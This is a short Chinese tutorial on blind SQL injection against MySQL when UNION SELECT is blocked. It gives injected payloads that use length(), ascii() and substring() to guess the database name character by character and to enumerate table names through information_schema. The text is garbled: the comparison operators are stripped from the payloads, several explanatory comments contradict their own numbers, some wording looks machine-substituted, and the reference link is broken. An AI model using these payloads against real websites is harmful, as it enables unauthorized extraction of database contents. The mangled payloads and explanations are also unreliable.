mysql 不支撑union select 的盲注方式






猜解数据库长度

and Length((database())) 10 //小于12返回正常阐明数据库是12位以下



and length((database())) 8 //小于8返回过错解释数据库名是9位的



猜解数据库名

and ascii(substring((database()),1,1))100 //100的ascii码d,说明不是d



and ascii(substring((database()),1,1))122 //122存在说明数据库名第一位是z



and ascii(substring((database()),2,1))114 返回错误说明不是ascii码114r 说明第二位不是r



and ascii(substring((database()),2,1))115 返回正常说明第二位是s



.....



猜表

and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema0x7A73323236315F6462 limit 0,1)) 10 #小于8返回畸形表现表小于10



and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema0x7A73323236315F6462 limit 0,1)) 9 #大于9返回毛病,表示值是9或8...







ascii码表参考:



apps.hi.baidu./share/detail/16685682